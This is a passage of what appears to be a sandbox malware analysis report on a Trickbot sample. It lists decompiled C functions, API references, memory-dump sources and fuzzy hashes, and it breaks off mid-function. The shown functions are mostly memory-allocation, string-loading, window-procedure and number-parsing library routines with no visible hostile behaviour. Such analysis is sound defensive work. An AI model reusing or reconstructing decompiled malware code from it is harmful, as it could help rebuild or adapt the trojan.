                          0x0042b61f
                          0x0042b626
                          0x0042b629
                          0x0042b5f0
                          0x0042b5f0
                          0x0042b5f3
                          0x0042b5f3
                          0x0042b5f3
                          0x0042b5fa
                          0x0042b5fd
                          0x00000000
                          0x0042b5fd
                          0x0042b5ee
                          0x0042b5a4
                          0x0042b5a4
                          0x0042b5a6
                          0x0042b5a7
                          0x0042b5ac
                          0x0042b5ac
                          0x0042b616
                          0x0042b61e

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042B590
                            • Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688
                            • Part of subcall function 00417440: __EH_prolog.LIBCMT ref: 00417445
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 969d4de4ea3e90b132ee8ca80b47fd874543e8384f09df8b19c95960b31900ac
                          • Instruction ID: 8cf7ecafdeaf0c82610319afc59b0982b9bef6098c3676b10efa0426e02d170f
                          • Opcode Fuzzy Hash: 969d4de4ea3e90b132ee8ca80b47fd874543e8384f09df8b19c95960b31900ac
                          • Instruction Fuzzy Hash: AB116070E102299BDB24DF65C885BEDB374FF04324F60466FE412A72D2DB78A905CB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041C702(int _a4, CHAR* _a8, int _a12) {
                          				void* _t5;
                          				signed char _t7;
                          				CHAR* _t8;
                          
                          				_t5 = E00432562();
                          				_t8 = _a8;
                          				_t7 = LoadStringA( *(_t5 + 0xc), _a4, _t8, _a12); // executed
                          				if(_t7 == 0) {
                          					 *_t8 =  *_t8 & _t7;
                          					return _t7;
                          				}
                          				return _t7;
                          			}
                          0x0041c703
                          0x0041c70c
                          0x0041c719
                          0x0041c721
                          0x0041c723
                          0x00000000
                          0x0041c723
                          0x0041c726

                          APIs
                          • LoadStringA.USER32(?,?,?,?), ref: 0041C719
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: LoadString
                          • String ID:
                          • API String ID: 2948472770-0
                          • Opcode ID: cd648bb8801f5ce69027542f20f9688bdab783a13e9f5cb9fcb40dc2325105fa
                          • Instruction ID: 9fef43086a5915e305f224032a7071d800dac95307d7e0d59c0f201a383442f6
                          • Opcode Fuzzy Hash: cd648bb8801f5ce69027542f20f9688bdab783a13e9f5cb9fcb40dc2325105fa
                          • Instruction Fuzzy Hash: 3AD0A7720083629BC701DF51CC04C8FBBA4BF58350F048C0EF49083151C364CD44CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004088E9(void* __ecx, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				signed int _t45;
                          				intOrPtr _t48;
                          				signed int _t49;
                          				intOrPtr _t51;
                          				intOrPtr _t52;
                          				intOrPtr _t53;
                          				signed int _t54;
                          				intOrPtr* _t55;
                          				signed int _t57;
                          				intOrPtr _t60;
                          				intOrPtr _t61;
                          				intOrPtr _t62;
                          				void* _t69;
                          				void* _t70;
                          				void* _t77;
                          				signed int _t78;
                          				intOrPtr _t81;
                          
                          				_t60 = _a4;
                          				_t81 =  *((intOrPtr*)(_t60 + 0x10));
                          				_t45 =  *(_t60 + 8);
                          				_t57 = 0;
                          				while(_t45 >= 0) {
                          					_t45 = _t45 << 1;
                          					_t57 = _t57 + 1;
                          				}
                          				_t69 = 0x3f;
                          				_t48 = _t57 * 0x204 + _t81 + 0x144;
                          				_v8 = _t48;
                          				do {
                          					 *((intOrPtr*)(_t48 + 8)) = _t48;
                          					 *((intOrPtr*)(_t48 + 4)) = _t48;
                          					_t48 = _t48 + 8;
                          					_t69 = _t69 - 1;
                          				} while (_t69 != 0);
                          				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
                          				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
                          				if(_t49 != 0) {
                          					_t70 = _t77 + 0x7000;
                          					if(_t77 <= _t70) {
                          						_t55 = _t77 + 0x10;
                          						do {
                          							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
                          							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
                          							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
                          							 *_t55 = _t55 + 0xffc;
                          							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
                          							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
                          							_t55 = _t55 + 0x1000;
                          						} while (_t55 - 0x10 <= _t70);
                          					}
                          					_t61 = _t77 + 0xc;
                          					_t51 = _v8 + 0x1f8;
                          					_t78 = 1;
                          					 *((intOrPtr*)(_t51 + 4)) = _t61;
                          					 *((intOrPtr*)(_t61 + 8)) = _t51;
                          					_t62 = _t70 + 0xc;
                          					 *((intOrPtr*)(_t51 + 8)) = _t62;
                          					 *((intOrPtr*)(_t62 + 4)) = _t51;
                          					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
                          					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
                          					_t52 =  *((intOrPtr*)(_t81 + 0x43));
                          					_t53 = _a4;
                          					 *((char*)(_t81 + 0x43)) = _t52 + 1;
                          					if(_t52 == 0) {
                          						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
                          					}
                          					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
                          					_t54 = _t57;
                          				} else {
                          					_t54 = _t49 | 0xffffffff;
                          				}
                          				return _t54;
                          			}
                          0x004088ed
                          0x004088f3
                          0x004088f6
                          0x004088f9
                          0x004088fb
                          0x004088ff
                          0x00408901
                          0x00408901
                          0x0040890e
                          0x0040890f
                          0x00408916
                          0x00408919
                          0x00408919
                          0x0040891c
                          0x0040891f
                          0x00408922
                          0x00408922
                          0x0040892c
                          0x0040893a
                          0x00408942
                          0x0040894c
                          0x00408954
                          0x00408956
                          0x00408959
                          0x00408959
                          0x0040895d
                          0x0040896a
                          0x00408971
                          0x00408979
                          0x0040897c
                          0x00408986
                          0x0040898e
                          0x00408959
                          0x00408995
                          0x00408998
                          0x0040899f
                          0x004089a0
                          0x004089a3
                          0x004089a6
                          0x004089a9
                          0x004089ac
                          0x004089af
                          0x004089b4
                          0x004089bb
                          0x004089c4
                          0x004089c7
                          0x004089ca
                          0x004089cc
                          0x004089cc
                          0x004089da
                          0x004089dd
                          0x00408944
                          0x00408944
                          0x00408944
                          0x004089e3

                          APIs
                          • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,00402EA0,?,0040860F,000000E0,?,j/@,00000000,000000E0,0040512A), ref: 0040893A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: c8c4f3bc6aad0600f3f1aa4a2393a0103a408dc92c21fc2dd2a8546f36144c37
                          • Instruction ID: c82468483a2187fc3a5fc2f4c2d09b69639984f2eedcedc64d0915c61d419481
                          • Opcode Fuzzy Hash: c8c4f3bc6aad0600f3f1aa4a2393a0103a408dc92c21fc2dd2a8546f36144c37
                          • Instruction Fuzzy Hash: CC319C716016069FD314CF19C984BA5BBE4FB50368F24C2BED1998B3E2DB74D906CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E00406991(signed int _a4, signed int _a8) {
                          				void* _t8;
                          				long _t11;
                          				void* _t13;
                          				long _t15;
                          				void* _t17;
                          				void* _t23;
                          
                          				_t15 = _a4 * _a8;
                          				_t11 = _t15;
                          				if(_t15 <= 0xffffffe0) {
                          					if(_t15 == 0) {
                          						_t15 = 1;
                          					}
                          					_t15 = _t15 + 0x0000000f & 0xfffffff0;
                          				}
                          				while(1) {
                          					_t13 = 0;
                          					if(_t15 > 0xffffffe0) {
                          						goto L8;
                          					}
                          					_t23 = _t11 -  *0x4482f4; // 0x3f8
                          					if(_t23 > 0) {
                          						L7:
                          						_t13 = HeapAlloc( *0x44d0bc, 8, _t15);
                          						if(_t13 != 0) {
                          							L12:
                          							return _t13;
                          						}
                          						goto L8;
                          					}
                          					E00408042(9);
                          					_push(_t11); // executed
                          					_t8 = E0040852F(); // executed
                          					_t13 = _t8;
                          					E004080A3(9);
                          					_t17 = _t17 + 0xc;
                          					if(_t13 != 0) {
                          						E00405360(_t13, 0, _t11);
                          						goto L12;
                          					}
                          					goto L7;
                          					L8:
                          					if( *0x44b838 == 0) {
                          						goto L12;
                          					}
                          					if(E00408144(_t15) == 0) {
                          						return 0;
                          					}
                          				}
                          			}
                          0x00406998
                          0x004069a0
                          0x004069a2
                          0x004069a6
                          0x004069aa
                          0x004069aa
                          0x004069ae
                          0x004069ae
                          0x004069b1
                          0x004069b1
                          0x004069b6
                          0x00000000
                          0x00000000
                          0x004069b8
                          0x004069be
                          0x004069dd
                          0x004069ec
                          0x004069f0
                          0x00406a14
                          0x00000000
                          0x00406a14
                          0x00000000
                          0x004069f0
                          0x004069c2
                          0x004069c7
                          0x004069c8
                          0x004069cf
                          0x004069d1
                          0x004069d6
                          0x004069db
                          0x00406a0c
                          0x00000000
                          0x00406a11
                          0x00000000
                          0x004069f2
                          0x004069f9
                          0x00000000
                          0x00000000
                          0x00406a04
                          0x00000000
                          0x00406a1a
                          0x00406a06

                          APIs
                          • HeapAlloc.KERNEL32(00000008,?,?,?,?,00407ACB,00000001,00000074,?,00405217), ref: 004069E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: 2d08122dd1fc9ab41293eabcec79aebafa58a37ac51ae7e424350b79346dea07
                          • Instruction ID: 93862fe949f06c54fae9554ead81b105e4667d7303a418b5c2638b7a98b0af10
                          • Opcode Fuzzy Hash: 2d08122dd1fc9ab41293eabcec79aebafa58a37ac51ae7e424350b79346dea07
                          • Instruction Fuzzy Hash: 97012876A0161066D62173296D41B5B2248DBC27B4F1B013BFD927B3C2DE7C4C114AAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0043291C(long _a4) {
                          				void* _t2;
                          				void* _t5;
                          				void* _t6;
                          
                          				_t2 = LocalAlloc(0x40, _a4); // executed
                          				_t6 = _t2;
                          				if(_t6 == 0) {
                          					E0041564B(_t5);
                          				}
                          				return _t6;
                          			}

                          APIs
                          • LocalAlloc.KERNELBASE(00000040,?,0044B4A0,00432B8E,00000010,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D), ref: 00432923
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AllocLocal
                          • String ID:
                          • API String ID: 3494564517-0
                          • Opcode ID: 4a5d0132e9d322bddd1c5f80f20e1722597d946fcc7e9ff7c610445913ff9419
                          • Instruction ID: dcf9de0bfcca85a356b4dcada8d64168c54f749efa90ccddd610f9377d1e5536
                          • Opcode Fuzzy Hash: 4a5d0132e9d322bddd1c5f80f20e1722597d946fcc7e9ff7c610445913ff9419
                          • Instruction Fuzzy Hash: 8EC08C72601932A7C62223949905BCB7A808F647A0F021462FB4996220C664CC4082E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 92%
                          			E00411AF0(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				char _v16;
                          				_Unknown_base(*)()* _v20;
                          				void* _v24;
                          				void* __ebx;
                          				void* __esi;
                          				_Unknown_base(*)()* _t52;
                          				signed int _t53;
                          				_Unknown_base(*)()* _t55;
                          				_Unknown_base(*)()* _t57;
                          				_Unknown_base(*)()* _t59;
                          				long _t62;
                          				signed char _t64;
                          				signed char _t70;
                          				void* _t78;
                          				int _t79;
                          				void* _t87;
                          				int _t88;
                          				signed char _t89;
                          				struct HWND__* _t90;
                          				long _t92;
                          
                          				_t87 = __edx;
                          				_t100 =  &_v24;
                          				_t88 = _a8;
                          				_t106 = _t88 - 0x82;
                          				if(_t88 != 0x82) {
                          					_t90 = _a4;
                          					__eflags = GetPropA(_t90, 0);
                          					if(__eflags == 0) {
                          						__eflags = _t88 - 0x86;
                          						if(_t88 > 0x86) {
                          							__eflags = _t88 - 0x138;
                          							if(_t88 > 0x138) {
                          								__eflags = _t88 - 0x1943;
                          								if(__eflags < 0) {
                          									goto L7;
                          								} else {
                          									__eflags = _t88 - 0x1944;
                          									if(__eflags <= 0) {
                          										 *_a16 = 1;
                          										return 0x3ee;
                          									} else {
                          										goto L7;
                          									}
                          								}
                          							} else {
                          								__eflags = _t88 - 0x132;
                          								if(_t88 >= 0x132) {
                          									GetClassNameA(_t90,  &_v16, 0x10);
                          									__eflags = lstrcmpA("#32770",  &_v16);
                          									if(__eflags == 0) {
                          										_t52 = GetWindowLongA(_t90, 4);
                          										__eflags = _t52;
                          										if(_t52 != 0) {
                          											__eflags = _t52 - 0xffff0000;
                          											if(_t52 <= 0xffff0000) {
                          												L40:
                          												_t92 = _a16;
                          												_t79 = _a12;
                          												_t53 = CallWindowProcA(_t52, _t90, _t88, _t79, _t92);
                          												__eflags = _t53;
                          												if(__eflags == 0) {
                          													L42:
                          													_t55 = E00410610(__eflags, _t90, 6);
                          													_t100 = _t100 + 8;
                          													_t52 = CallWindowProcA(_t55, _t90, _t88 + 0xcbf, _t79, _t92);
                          													__eflags = _t52;
                          													if(_t52 == 0) {
                          														goto L44;
                          													} else {
                          														__eflags = _t52 - 1;
                          														if(_t52 == 1) {
                          															goto L44;
                          														}
                          													}
                          												} else {
                          													__eflags = _t53 - 1;
                          													if(__eflags == 0) {
                          														goto L42;
                          													}
                          												}
                          											} else {
                          												__eflags =  *0x44d360 - 0x30a;
                          												if(__eflags > 0) {
                          													goto L40;
                          												} else {
                          													_t92 = _a16;
                          													_t79 = _a12;
                          													_t57 = E00410610(__eflags, _t90, 6);
                          													_t100 =  &_v24 + 8;
                          													_t52 = CallWindowProcA(_t57, _t90, _t88 + 0xcbf, _t79, _t92);
                          													__eflags = _t52;
                          													if(_t52 == 0) {
                          														goto L44;
                          													} else {
                          														__eflags = _t52 - 1;
                          														if(_t52 == 1) {
                          															goto L44;
                          														}
                          													}
                          												}
                          											}
                          										} else {
                          											_t92 = _a16;
                          											_t79 = _a12;
                          											_push(_t92);
                          											goto L45;
                          										}
                          									} else {
                          										_t92 = _a16;
                          										_t79 = _a12;
                          										_t59 = E00410610(__eflags, _t90, 6);
                          										_t100 =  &_v24 + 8;
                          										_t52 = CallWindowProcA(_t59, _t90, _t88 + 0xcbf, _t79, _t92);
                          										__eflags = _t52;
                          										if(_t52 == 0) {
                          											L44:
                          											_push(_t92);
                          											L45:
                          											_push(_t79);
                          											_push(_t88);
                          											_t52 = E00411280(_t52, _t87, _t90);
                          										} else {
                          											__eflags = _t52 - 1;
                          											if(_t52 == 1) {
                          												goto L44;
                          											}
                          										}
                          									}
                          									__eflags = _t52;
                          									if(__eflags == 0) {
                          										goto L8;
                          									} else {
                          										return _t52;
                          									}
                          								} else {
                          									__eflags = _t88 - 0x110;
                          									if(__eflags == 0) {
                          										_v20 = E00410610(__eflags, _t90, 6);
                          										__eflags =  *0x44d360 - 0x35f;
                          										if( *0x44d360 < 0x35f) {
                          											L22:
                          											_v24 = 1;
                          										} else {
                          											_t70 = GetWindowLongA(_t90, 0xfffffff0);
                          											_v24 = 0;
                          											__eflags = _t70 & 0x00000004;
                          											if((_t70 & 0x00000004) == 0) {
                          												goto L22;
                          											}
                          										}
                          										_t62 = SendMessageA(_t90, 0x11f0, 0,  &_v24);
                          										__eflags = _v24;
                          										if(_v24 != 0) {
                          											_t80 = _a12;
                          											_t64 = CallWindowProcA(_v20, _t90, _t88, _a12, _a16);
                          											__eflags =  *0x44d360 - 0x35f;
                          											_t89 = _t64;
                          											if( *0x44d360 < 0x35f) {
                          												L27:
                          												E00411190(_t64, _t80, _t87, _t90, 0xffff);
                          											} else {
                          												_t64 = GetWindowLongA(_t90, 0xfffffff0);
                          												__eflags = _t64 & 0x00000004;
                          												if((_t64 & 0x00000004) == 0) {
                          													goto L27;
                          												}
                          											}
                          											return _t89;
                          										} else {
                          											E00410F40(_t62, _t78, _t87, _t90);
                          											return CallWindowProcA(_v24, _t90, _t88, _a8, _a12);
                          										}
                          									} else {
                          										goto L7;
                          									}
                          								}
                          							}
                          						} else {
                          							__eflags = _t88 - 0x85;
                          							if(_t88 >= 0x85) {
                          								L16:
                          								__eflags =  *0x44d360 - 0x35f;
                          								if(__eflags >= 0) {
                          									L19:
                          									return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
                          								} else {
                          									__eflags = IsIconic(_t90);
                          									if(__eflags != 0) {
                          										goto L19;
                          									} else {
                          										return E00411340(_t90, _t88, _a12, _a16, 0);
                          									}
                          								}
                          							} else {
                          								__eflags = _t88 - 0xc;
                          								if(__eflags == 0) {
                          									goto L16;
                          								} else {
                          									L7:
                          									_t79 = _a12;
                          									_t92 = _a16;
                          									L8:
                          									return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _t79, _t92);
                          								}
                          							}
                          						}
                          					} else {
                          						return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
                          					}
                          				} else {
                          					return E00410840(_t106, _a4, _t88, _a12, _a16, 6);
                          				}
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 00411B35
                          • CallWindowProcA.USER32(00000000), ref: 00411B57
                            • Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$CallProcRemoveWindow
                          • String ID: #32770
                          • API String ID: 2276450057-463685578
                          • Opcode ID: 78d62eab1a013060756a189334512b458c10be6afb0ca5f9fe7f6207079f0ea7
                          • Instruction ID: 385f296229117b5dd7e49720c0eb5d2d8c0126a1149772ac2821be927c84e00f
                          • Opcode Fuzzy Hash: 78d62eab1a013060756a189334512b458c10be6afb0ca5f9fe7f6207079f0ea7
                          • Instruction Fuzzy Hash: 4481E6367053047BD620AB11EC84FDF776CEB85765F40082BFB01822A1E769ADD586BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E0040C442(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
                          				signed int _v8;
                          				char _v12;
                          				signed char* _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v58;
                          				signed int _v62;
                          				signed int _v66;
                          				signed int _v68;
                          				char _v73;
                          				char _v96;
                          				signed int _t121;
                          				intOrPtr _t141;
                          				intOrPtr _t143;
                          				signed int _t146;
                          				intOrPtr* _t148;
                          
                          				_t148 = _a12;
                          				_v16 =  &_v96;
                          				_t121 = 0;
                          				_t146 = 1;
                          				_v44 = 0;
                          				_v28 = _t146;
                          				_v8 = 0;
                          				_v20 = 0;
                          				_v40 = 0;
                          				_v36 = 0;
                          				_v48 = 0;
                          				_v52 = 0;
                          				_v32 = 0;
                          				_v12 = 0;
                          				_v24 = 0;
                          				_a12 = _t148;
                          				L1:
                          				_t143 =  *_t148;
                          				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
                          					_t148 = _t148 + 1;
                          					goto L1;
                          				}
                          				_push(4);
                          				while(1) {
                          					L7:
                          					_t141 =  *_t148;
                          					_t148 = _t148 + 1;
                          					if(_t121 > 0xb) {
                          						break;
                          					}
                          					switch( *((intOrPtr*)(_t121 * 4 +  &M0040C8E3))) {
                          						case 0:
                          							__eflags = _t141 - 0x31;
                          							if(_t141 < 0x31) {
                          								L12:
                          								__eflags = _t141 -  *0x448650; // 0x2e
                          								if(__eflags != 0) {
                          									_t137 = _t141 - 0x2b;
                          									__eflags = _t137;
                          									if(_t137 == 0) {
                          										_v44 = _v44 & 0x00000000;
                          										_push(2);
                          										_pop(_t121);
                          										goto L7;
                          									}
                          									_t139 = _t137;
                          									__eflags = _t139;
                          									if(_t139 == 0) {
                          										_push(2);
                          										_v44 = 0x8000;
                          										_pop(_t121);
                          										goto L7;
                          									}
                          									__eflags = _t139 != 3;
                          									if(_t139 != 3) {
                          										goto L109;
                          									}
                          									goto L36;
                          								}
                          								goto L13;
                          							}
                          							__eflags = _t141 - 0x39;
                          							if(_t141 > 0x39) {
                          								goto L12;
                          							}
                          							goto L11;
                          						case 1:
                          							__eflags = __bl - 0x31;
                          							_v20 = __edx;
                          							if(__bl < 0x31) {
                          								L22:
                          								__eflags = __bl -  *0x448650; // 0x2e
                          								if(__eflags == 0) {
                          									goto L47;
                          								}
                          								__eflags = __bl - 0x2b;
                          								if(__bl == 0x2b) {
                          									goto L31;
                          								}
                          								__eflags = __bl - 0x2d;
                          								if(__bl == 0x2d) {
                          									goto L31;
                          								}
                          								__eflags = __bl - 0x30;
                          								if(__bl == 0x30) {
                          									goto L36;
                          								}
                          								goto L26;
                          							}
                          							__eflags = __bl - 0x39;
                          							if(__bl <= 0x39) {
                          								goto L11;
                          							}
                          							goto L22;
                          						case 2:
                          							__eflags = __bl - 0x31;
                          							if(__bl < 0x31) {
                          								L34:
                          								__eflags = __bl -  *0x448650; // 0x2e
                          								if(__eflags == 0) {
                          									L13:
                          									_push(5);
                          									goto L90;
                          								}
                          								__eflags = __bl - 0x30;
                          								if(__bl != 0x30) {
                          									goto L94;
                          								}
                          								L36:
                          								_t121 = _t146;
                          								goto L7;
                          							}
                          							__eflags = __bl - 0x39;
                          							if(__bl <= 0x39) {
                          								L11:
                          								_push(3);
                          								goto L81;
                          							}
                          							goto L34;
                          						case 3:
                          							_v20 = __edx;
                          							while(1) {
                          								__eflags =  *0x44864c - __edx; // 0x1
                          								if(__eflags <= 0) {
                          									__ecx =  *0x448440; // 0x44844a
                          									__eax = __bl & 0x000000ff;
                          									__eax = __bl & 0x000000ff & __esi;
                          									__eflags = __eax;
                          								} else {
                          									__eax = __bl & 0x000000ff;
                          									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
                          									_pop(__ecx);
                          									_pop(__ecx);
                          									_push(1);
                          									_pop(__edx);
                          								}
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									break;
                          								}
                          								__eflags = _v8 - 0x19;
                          								if(_v8 >= 0x19) {
                          									_t31 =  &_v12;
                          									 *_t31 = _v12 + 1;
                          									__eflags =  *_t31;
                          								} else {
                          									__eax = _v16;
                          									_v8 = _v8 + 1;
                          									__bl = __bl - 0x30;
                          									_v16 =  &(_v16[1]);
                          									 *_v16 = __bl;
                          								}
                          								__bl =  *__edi;
                          								__edi = __edi + 1;
                          							}
                          							__eflags = __bl -  *0x448650; // 0x2e
                          							if(__eflags != 0) {
                          								goto L58;
                          							}
                          							L47:
                          							__eax = __esi;
                          							goto L7;
                          						case 4:
                          							__eflags = _v8;
                          							_v20 = __edx;
                          							_v40 = __edx;
                          							if(_v8 != 0) {
                          								while(1) {
                          									L51:
                          									__eflags =  *0x44864c - __edx; // 0x1
                          									if(__eflags <= 0) {
                          										__ecx =  *0x448440; // 0x44844a
                          										__eax = __bl & 0x000000ff;
                          										__eax = __bl & 0x000000ff & __esi;
                          										__eflags = __eax;
                          									} else {
                          										__eax = __bl & 0x000000ff;
                          										__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
                          										_pop(__ecx);
                          										_pop(__ecx);
                          										_push(1);
                          										_pop(__edx);
                          									}
                          									__eflags = __eax;
                          									if(__eax == 0) {
                          										break;
                          									}
                          									__eflags = _v8 - 0x19;
                          									if(_v8 < 0x19) {
                          										__eax = _v16;
                          										_v8 = _v8 + 1;
                          										__bl = __bl - 0x30;
                          										_v16 =  &(_v16[1]);
                          										_t46 =  &_v12;
                          										 *_t46 = _v12 - 1;
                          										__eflags =  *_t46;
                          										 *_v16 = __bl;
                          									}
                          									__bl =  *__edi;
                          									__edi = __edi + 1;
                          								}
                          								L58:
                          								__eflags = __bl - 0x2b;
                          								if(__bl == 0x2b) {
                          									L31:
                          									__edi = __edi - 1;
                          									_push(0xb);
                          									goto L90;
                          								}
                          								__eflags = __bl - 0x2d;
                          								if(__bl == 0x2d) {
                          									goto L31;
                          								}
                          								L26:
                          								__eflags = __bl - 0x43;
                          								if(__bl <= 0x43) {
                          									goto L109;
                          								}
                          								__eflags = __bl - 0x45;
                          								if(__bl <= 0x45) {
                          									L30:
                          									_push(6);
                          									goto L90;
                          								}
                          								__eflags = __bl - 0x63;
                          								if(__bl <= 0x63) {
                          									goto L109;
                          								}
                          								__eflags = __bl - 0x65;
                          								if(__bl > 0x65) {
                          									goto L109;
                          								}
                          								goto L30;
                          							} else {
                          								goto L49;
                          							}
                          							while(1) {
                          								L49:
                          								__eflags = __bl - 0x30;
                          								if(__bl != 0x30) {
                          									goto L51;
                          								}
                          								_v12 = _v12 - 1;
                          								__bl =  *__edi;
                          								__edi = __edi + 1;
                          							}
                          							goto L51;
                          						case 5:
                          							__eflags =  *0x44864c - __edx;
                          							_v40 = __edx;
                          							if( *0x44864c <= __edx) {
                          								__ecx =  *0x448440; // 0x44844a
                          								__eax = __bl & 0x000000ff;
                          								__eax = __bl & 0x000000ff & __esi;
                          								__eflags = __eax;
                          							} else {
                          								__eax = __bl & 0x000000ff;
                          								__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
                          								_pop(__ecx);
                          								_pop(__ecx);
                          								_push(1);
                          								_pop(__edx);
                          							}
                          							__eflags = __eax;
                          							if(__eax == 0) {
                          								goto L94;
                          							} else {
                          								__eax = __esi;
                          								goto L82;
                          							}
                          						case 6:
                          							_t51 = __edi - 2; // 0x0
                          							__ecx = _t51;
                          							__eflags = __bl - 0x31;
                          							_a12 = __ecx;
                          							if(__bl < 0x31) {
                          								L68:
                          								__eax = __bl;
                          								__eax = __bl - 0x2b;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									goto L89;
                          								}
                          								__eax = __eax - 1;
                          								__eax = __eax - 1;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									goto L88;
                          								}
                          								__eax = __eax - 3;
